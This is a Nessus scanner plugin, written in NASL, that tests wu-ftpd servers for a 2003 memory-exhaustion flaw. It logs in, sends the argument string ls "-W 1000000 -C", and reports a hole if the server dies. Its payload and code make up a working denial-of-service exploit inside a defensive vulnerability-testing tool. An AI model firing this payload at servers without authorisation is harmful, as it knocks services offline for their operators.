# This script was written by Michel Arboi # It is released under the General Public License (GPLv2). # # Credit: Georgi Guninski discovered this attack # if (description) { script_id(11909); script_cve_id("CAN-2003-0853", "CAN-2003-0854"); if (defined_func("script_xref")) { script_xref(name: "CONECTIVA", value: "CLA-2003:768"); script_xref(name: "zone-h", value: "3299"); } script_version("$Revision$"); name["english"] = "wu-ftpd ls -W memory exhaustion"; script_name(english: name["english"]); desc["english"] = ' The FTP server does not filter arguments to the ls command. It is possible to consume all available memory on the machine by sending ls "-w 1000000 -C" See http://www.guninski.com/binls.html Solution : Contact your vendor for a fix Risk factor : High'; script_description(english: desc["english"]); script_summary(english: "send ls -w 1000000 -C to the remote FTP server"); script_category(ACT_KILL_HOST); # Could be ACT_MIXED_ATTACK if I had a banner script_family(english: "FTP"); script_copyright(english: "Copyright (C) 2003 Michel Arboi"); script_dependencie("find_service.nes", "ftp_anonymous.nasl"); script_require_ports("Services/ftp", 21); exit(0); } # include("ftp_func.inc"); port = get_kb_item("Services/ftp"); if (!port) port = 21; if (!get_port_state(port)) exit(0); user = get_kb_item("ftp/login"); pass = get_kb_item("ftp/password"); if (! user) user = "anonymous"; if (! pass) pass = "nessus@private"; soc = open_sock_tcp(port); if (!soc) exit(0); if (! ftp_log_in(socket:soc, user: user, pass: pass)) exit(0); start_denial(); send(socket:soc, data: 'ls "-W 1000000 -C"\r\n'); r = ftp_recv_listing(socket: soc); ftp_close(socket: soc); alive = end_denial(); if (! alive) { security_hole(port); exit(0); } soc = open_sock_tcp(port); if (! soc || ! ftp_log_in(socket:soc, user: user, pass: pass)) security_hole(port); if (soc) ftp_close(socket: soc);